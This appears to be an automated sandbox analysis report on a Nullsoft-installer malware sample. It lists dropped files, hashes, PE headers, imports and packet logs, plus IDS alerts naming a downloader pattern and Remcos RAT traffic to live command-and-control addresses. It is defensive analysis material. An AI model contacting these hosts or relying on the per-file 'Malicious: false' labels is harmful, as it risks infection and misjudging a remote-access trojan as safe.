SHA-512:	7910AE1185D498475FF78B7593C80C7D7C5F5FA51BAD0BEF40010A992FF9BF3C1982177A84588C22E0EB6525D53439540C4FC99155E3418463CB1F3FC77C8DE7
Malicious:	false
Preview:	./...................8......///.....GG.........~.....N.................a......y."""...................................CCCC.........x.......P................&.........sss..........GGGG.............rrr...................P......PP.U........C...m........l....[......{....................X...............zz.....nn...eee..**..........w...................n...............s..............////............s................=.....8.................[."..,.......4....S.uu............................................\.ffff....t..........11..........................!..hhhh......z.??.......wwww........^^.....e.....q.......).......==...._......rrr............II....(..RRRR.V.........;.ss.....\|...m....p.ww......o.!...........................yyyy...................(...................d....7...............................i.................C.E.........333.hh.!..:::..____....j.....................??...........lll.m.. ..............].C..C..##..c.....................................%%..............C...p.......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\Gemen.Aer

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	data
Category:	dropped
Size (bytes):	155054
Entropy (8bit):	4.606128415946002
Encrypted:	false
SSDEEP:	1536:v8/VFzzxaCNHbPfvGOm7fGZwpWYhu81CABO1UDVrUEog+AdMIqXczZgmk2m5:k7xxRTf+n+ZwXtRBO2VPg0/3m5
MD5:	836B92F0A4928C14C98DF4B3FCC0797F
SHA1:	9D494C2D5332C4D4F799C215BD8C260A8A2D3C99
SHA-256:	15014E3AD8B7297A15E47E245A02E099F0E964E64E5D64079D5E95599B9E09FB
SHA-512:	D9D5F00FBE4BAC6F7211C6E9BCB890974D30C58C63C0284291F41AC1842FC0D4CFA69BD7987F965008142A986B858A7336A68D966F54ABCE9B2C1AD39F9D0B53
Malicious:	false
Preview:	..~~............................H.....cc............................>>...4......GG.......PPPPP.K...k........s...?.......zzz...AA..............b...^^^^.....................AA........!!....z.......................................V./............33...............E........aa.KK........L.KK......u.........M...................................W........%%......HHHH........................-.......................s.................p....O..........000..N...`.::::......*...............AA.....................///....---.............c.........J......l................dd........d...........5................E...........................((.....p....^.......QQ...YYY.t..............PP..222222..........[................>>....jj.((((.kkk...........[.._.......V.i...........LLLLL..../............\|..C.........................99.\\.......................aa.....................www....[...rr........I..u..9....H....II......:...........+.............{{.p....8.................T...............A....T...........v.........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\Unshieldable.txt

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	384
Entropy (8bit):	4.181922364695503
Encrypted:	false
SSDEEP:	6:hLSQ1t70vwRiopg/iZJoLBduF00X3KA4pcW+vmQQWLUbUHrMrCK+I6MDGIU79evD:hN04RicZiLBdA4pPWLZorgZMDGIU7Mr
MD5:	78D840110C9709A6F508016469DB3D70
SHA1:	C3D13AB39B7FCEACAB772CE6E0326534C785B556
SHA-256:	C5B25CB253F46AA344C6543D87B93B973337D71CFE28D82F1A138E35A957F81C
SHA-512:	C4E0526A4000EE4D477DC9E95F43CD2940C7B81E452FDEE70D08E92F3DC60356F41FD4D88FB09C8B8A5819EA930FFC339E9C18D9D3D8DCEEDE8631C5FAEA5F0D
Malicious:	false
Preview:	samfundsordnens sonorescence nonenvironmentally acropolitan,brunissure gala valdrappene barton stridsksers egebark zorrillo..brodernationens grandtotal documentises kortkunden aneared ceruse andry..dejens omrringens eksorcist anacrotic drmmeslottet modulationsfrekvens,agerbrugernes frstegangspatient beboersammenstning afrakningernes tyvetsenes,whindle dokumentation monsignor melbr,

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\amorphism.rds

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	data
Category:	dropped
Size (bytes):	2527384
Entropy (8bit):	0.15771732412061856
Encrypted:	false
SSDEEP:	768:cV2EqQl1cX7MZhmJTywdQ2Z2QYnLs0H1h8OczA++COcK0GYcj9Zy3/I0kfcwlbfK:Ve
MD5:	1605B3CE3BC79189F8694FF97A10C5E4
SHA1:	B82ED5C328BDA0E88E57F3DD8075C989ECC93317
SHA-256:	85BCF4761B920061E9D3451C6CAEEEFD8B9199D6B47085F461715188D9234987
SHA-512:	FF81B66027C077BE28D0C52D790DD230A66C0E61BA89867880C7A99294D97B60AF5822AD5FE3C6D83CB01F68D5470952C2CAC99695865FE7A34D69D2A1E08431
Malicious:	false
Preview:	...................................................................................................................................................................................................................................................................................................................................v....................g.....................................................7....................................................................................................................................................................................................................................................................................................................................................................................................................................................,....................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\brolins.par

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	data
Category:	dropped
Size (bytes):	10633816
Entropy (8bit):	0.15833238703625532
Encrypted:	false
SSDEEP:	768:JiH6Tc7n5/aJJ9qWS2gAuGn6ZiMCwfjh+V2yQX9daDQjdbAFrmE1vsevL9Ub1aqJ:01l16flG
MD5:	1F0E8B8C829457FF8BC9A6D066A67949
SHA1:	7B91EF7C02E35D120729EB4E5D37CF9E72DEE466
SHA-256:	AE3CD420FC97538E335B7199244A8338636F647F6DB92C84B972A6817B7BE247
SHA-512:	1949D2312709F465CD734AAD3FA0530C23E86C88C42A55820E4B47B61C25FAE35F94628AE174451819B74FDFBF540AF0E07D1CB69997925ADFF92A30E4854F44
Malicious:	false
Preview:	.....................................................................G..............................................................................................#....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................O..................................................................................................................................................................................q...........................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\gruffness.mis

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	data
Category:	dropped
Size (bytes):	6456826
Entropy (8bit):	0.15828912434236683
Encrypted:	false
SSDEEP:	768:eCPhDopkmPa4U2P3Uwkg5VvCU7YgRh8T8JhJC4ULpMPY8SsogMlg78dlGPg0vN1b:VW7uE89Eu
MD5:	1D76BAD74066C8632B985BFEF7403BA7
SHA1:	3B61768A449C3D1BAE0E82DE599ADF5130917D54
SHA-256:	747794579030D9280702A056DF2546FEC218D1259F268075243C1204723A91D1
SHA-512:	158138DD678D437482484F1835ADFCD4349A1DDD3E7CF508A5DBACA358771069060793EF8FD5FF661D641C4EA520868B013B5B65B920A766963EED7A38C448D4
Malicious:	false
Preview:	.................................................................................................................................................................................................................................................................................S..............................................................................................................................................................................................................................................................................................................................................................}.......................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\kamik.sen

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	data
Category:	dropped
Size (bytes):	1271421
Entropy (8bit):	0.15816996989165297
Encrypted:	false
SSDEEP:	768:W7rtu0KSmXSs3fA+rQ/4FkDCXMdHdyq5hDJAkKBYnDAc:t
MD5:	0507D743AD7E1ABA22BC2024E4813353
SHA1:	D89D4377D380A52492610C059AD09241A320B89B
SHA-256:	FF629154C61F5DBC70FFA5604F7D4F0DE88A982E0E034EAA72339B5B52A92404
SHA-512:	6A8C4CA920FA6D921C4D7D15A6F3A4DB19526FEC88BC1EEEE24BA0168855280A89333A49607B66009E5E95B9F099FE86752582A5F41874309110248FA4DE4D7A
Malicious:	false
Preview:	......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................7...k.............................................................................\|................................................................................................................................................................d...........................................................................................<..................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\ptca.ant

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	data
Category:	dropped
Size (bytes):	6804430
Entropy (8bit):	0.15943662261477257
Encrypted:	false
SSDEEP:	768:MQ/VuBzIpI4PtRMbHS+BnchAixbya9vkqNsWlP096/9WFRN8PR1nw2nVXsaNRW44:JSGMfX
MD5:	7C28FF654A13329CE1E20646DD23F864
SHA1:	2A65BC0FC67CBEA9F59F7E315C9591711E81F235
SHA-256:	9B9E25D40762E80084ED7F33A487F4948483914C91EAF903D5D82A862753A423
SHA-512:	23E49F5FAACCB14895FD48A255C9632D73307492A2585B1A6881CF03ACD3D9B5E60C1351CE10CA581CDDB5C0D78D4EFF951A0275B7526850E5FB4B0442A5461A
Malicious:	false
Preview:	............................................................................................................................................................................................................................................................................h................................................................"........................................................................................................................................................a..............................................................................................................................h..............................................................................................................................................~........................................N...........................................................1.........................m....................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\udstyringsindikatoren.inw

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	data
Category:	dropped
Size (bytes):	2599548
Entropy (8bit):	0.15790946923512963
Encrypted:	false
SSDEEP:	768:J+LajrrMq9eQMzGaUk1/wd+BpREEsAWZMOo6Q991C5XhBtblZXTPA1YcF98h2218:gjW
MD5:	7F2BF13C70E094999CA92A423DCCDB92
SHA1:	463C9E61B745CFF59DBD170780FD43B20FD43456
SHA-256:	3A2304AABDE64DDBB367916594F86E9E8016A35119914FB51316BAF272B7A99B
SHA-512:	133952552E498A30E7CF0835851B04AF6BDED00205F18A9EEF1304AC3590621DFAD1D58D0F9C884799E8CD4874E710566099EA2047DF89FA76507030AA121839
Malicious:	false
Preview:	.........................................................................................e.......................n..............................................................................................!..................^.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................X............................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\understaaet.sno

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	data
Category:	dropped
Size (bytes):	7674503
Entropy (8bit):	0.159448269074076
Encrypted:	false
SSDEEP:	768:EI34KF96i325GRTHsrKRQfgBmcMbX8PQsm5BtEe3/EeIs5ywhG+ZQiA/eWi0xTmM:bGMHku0R
MD5:	DDD9C6D20756697A879CEE4C30426407
SHA1:	0D2E33372ECCBB05FA6D6DD3A1C62ACA728A192C
SHA-256:	9A512C11BC03FE9CD5CC0545BECBE95B7F1D915E4A9937B97AD3A0B994E555AF
SHA-512:	2E48D2EFEA18B27492210B36A6F19E4839CB76C5F570DBCAEC13F7C8BC360B4DAD03C309290B167DC9A984F40A113D53E726C8E4267822883B2458649723F1E6
Malicious:	false
Preview:	...................................................................................................v..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................6.........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\vaccenic.san

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	data
Category:	dropped
Size (bytes):	912531
Entropy (8bit):	0.15809016661177164
Encrypted:	false
SSDEEP:	768:vGMeVeOL+VVl4PXJnMv8Myx7x0c0o3BuvUH6739vYF:9yR
MD5:	93B0BFEBA809AF2EF89BAE6C068BF790
SHA1:	359D4F82264B813C937668E6D848F68E4A366495
SHA-256:	3926FA51200C8AE3F785C31AA4E37E8AE4BB4F6CEFFB4A29B992F4B96C70E169
SHA-512:	0FB853954844C20467BC56E66328DE3E1C727037747844BF21D963C467E8FDD338059BEDA350EF31B6E420A3DCB573536722BE74030935EF1E59EA93C053BDC7
Malicious:	false
Preview:	......................................................................................................................................................m.......................0............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U............................................................l...............................................

C:\Users\user\Music\Udstyrelserne.ini

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	43
Entropy (8bit):	3.9834949868577314
Encrypted:	false
SSDEEP:	3:ZRADhx+DLWeaPv:ZRkk6eu
MD5:	FF1979A4E488C54C656C860B558916BA
SHA1:	62DE8C42E6DBB7DF0A17638DF7E2DD69581B8B5B
SHA-256:	81B110E3324CA1280458B649B6D7C08FE3D4D2C1F9406E57A25A29A9E260C936
SHA-512:	4F3E0371ADBB1D54ED073C6A3AF64AA1CB6ECDAAEB76ABA333114BC7D714EAEF7FE51C2A4E559907E8B2E816B46B55B8E6B1B680041BE61ADD957B1958454A96
Malicious:	false
Preview:	[stttefamilier]..gendarmerie=brevvekslede..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.996364301455999
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	IpykYx5iwz.exe
File size:	1'727'984 bytes
MD5:	15214c528c41de4d5e542ebd3d4ac075
SHA1:	bdab48d323ab0e0c4689061db5fb08adfe1afec8
SHA256:	5aeb1293c473a66795bf0ff3a7892e6a6cf70aea5248a38f204632a5fdbe1f63
SHA512:	02b6635e4f1a98765e65ee14db0e93ab8dfdf4c7c0086addad86e4a09466ae49dc66accda0bc142828656fca994eb99255ea4c762ffc9f6706410e4877cc9fc2
SSDEEP:	24576:t9tWunuwwAghUBUQyXGF8X0VMMOFdYHJStLidtLw8tWVq6VdbcGstKR18+YDQZp:NWtP4+P0Vn+dYHMwwjbV6Gst2aDQZp
TLSH:	568533A953F00077E390263078BED454EB5D27476F63C79AF7903CB032A26964E09E7A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.w.F......F...v...F...@...F.Rich..F.........PE..L......].................b...........3............@

File Icon


Icon Hash:	3d2e0f95332b3399

Static PE Info

General

Entrypoint:	0x403384
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5DF6D4EA [Mon Dec 16 00:50:50 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7c2c71dfce9a27650634dc8b1ca03bf0

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=cephalothecal, E=Smidiggrelserne@Ekstensive.bl, O=cephalothecal, L=Zadelsdorf, OU="Digestions Iongitter Ruskurser ", S=Th\xfcringen, C=DE
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	21/03/2024 01:44:22 21/03/2025 01:44:22
Subject Chain	CN=cephalothecal, E=Smidiggrelserne@Ekstensive.bl, O=cephalothecal, L=Zadelsdorf, OU="Digestions Iongitter Ruskurser ", S=Th\xfcringen, C=DE
Version:	3
Thumbprint MD5:	3D01B8E5D660A86142C31FA45F9D69D6
Thumbprint SHA-1:	291309E43A849FEEE4744A692806BAA4ADD52E29
Thumbprint SHA-256:	7B87DD29E029233FEB0E733086C7F5F73FE835AABA263F1F53EE64E1CCD16F95
Serial:	2A7E1142DFD3BF677921C7FD1D5CDF39C12D8EA2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042472Ch], eax
je 00007FD82486BD03h
push ebx
call 00007FD82486EE03h
cmp eax, ebx
je 00007FD82486BCF9h
push 00000C00h
call eax
mov esi, 00408298h
push esi
call 00007FD82486ED7Fh
push esi
call dword ptr [004080A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FD82486BCDDh
push 0000000Ah
call 00007FD82486EDD7h
push 00000008h
call 00007FD82486EDD0h
push 00000006h
mov dword ptr [00424724h], eax
call 00007FD82486EDC4h
cmp eax, ebx
je 00007FD82486BD01h
push 0000001Eh
call eax
test eax, eax
je 00007FD82486BCF9h
or byte ptr [0042472Fh], 00000040h
push ebp
call dword ptr [00408040h]
push ebx
call dword ptr [00408284h]
mov dword ptr [004247F8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041FCF0h
call dword ptr [00408178h]
push 0040A1ECh

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8430	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0xe60	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1a5688	0x768
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x294	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x60e4	0x6200	2af1530c9ae9afbf7316987a7849a4db	False	0.6626275510204082	data	6.418841418321694	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x123e	0x1400	d28a5cce7e1fff61851e692820673c10	False	0.4283203125	data	5.0340602419439024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1a838	0x400	e698d830f2431b27ee24c7be8af893ba	False	0.64453125	data	5.218393601728302	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x25000	0x12000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x37000	0xe60	0x1000	fac1fd0c4d68005346a60e380027ba25	False	0.401123046875	data	4.031104968462267	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x37208	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.42473118279569894
RT_DIALOG	0x374f0	0x120	data	English	United States	0.5104166666666666
RT_DIALOG	0x37610	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x37730	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x377f8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x37858	0x14	data	English	United States	1.2
RT_VERSION	0x37870	0x2ac	data	English	United States	0.49707602339181284
RT_MANIFEST	0x37b20	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, Sleep, GetTickCount, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, SetFileAttributesA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, GlobalUnlock, GetDiskFreeSpaceA, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll	GetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
GDI32.dll	SelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T20:38:48.834449+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49736	164.160.91.32	443	TCP
2025-01-10T20:39:14.698396+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49737	94.156.177.164	2404	TCP
2025-01-10T20:39:37.086202+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49738	94.156.177.164	2404	TCP
2025-01-10T20:39:59.513567+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49826	94.156.177.164	2404	TCP
2025-01-10T20:40:21.908012+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	49955	94.156.177.164	2404	TCP
2025-01-10T20:40:44.295391+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50009	94.156.177.164	2404	TCP
2025-01-10T20:41:06.685480+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50010	94.156.177.164	2404	TCP
2025-01-10T20:41:29.092444+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50011	94.156.177.164	2404	TCP
2025-01-10T20:41:51.468057+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50012	94.156.177.164	2404	TCP
2025-01-10T20:42:13.857616+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50013	94.156.177.164	2404	TCP
2025-01-10T20:42:36.234204+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.2.4	50014	94.156.177.164	2404	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 20:38:47.154145002 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:47.154198885 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:47.154306889 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:47.228058100 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:47.228087902 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:48.140913963 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:48.142216921 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:48.505548954 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:48.505583048 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:48.505920887 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:48.505966902 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:48.512171984 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:48.555336952 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:48.834459066 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:48.834522963 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:48.834538937 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:48.834578991 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.061122894 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.061137915 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.061192036 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.061222076 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.061239958 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.061274052 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.061289072 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.063118935 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.063149929 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.063179970 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.063189030 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.063231945 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.299853086 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.299880981 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.299945116 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.299959898 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.299998045 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.301505089 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.301523924 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.301614046 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.301620007 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.301661015 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.303283930 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.303299904 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.303359985 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.303365946 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.303412914 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.304595947 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.304610014 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.304691076 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.304696083 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.304847002 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.526736021 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.526762009 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.526825905 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.526842117 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.526897907 CET	49736	443	192.168.2.4	164.160.91.32
Jan 10, 2025 20:38:49.528001070 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.528017998 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.528091908 CET	443	49736	164.160.91.32	192.168.2.4
Jan 10, 2025 20:38:49.528095007 CET	49736	443	192.168.2.4	164.160.91.32
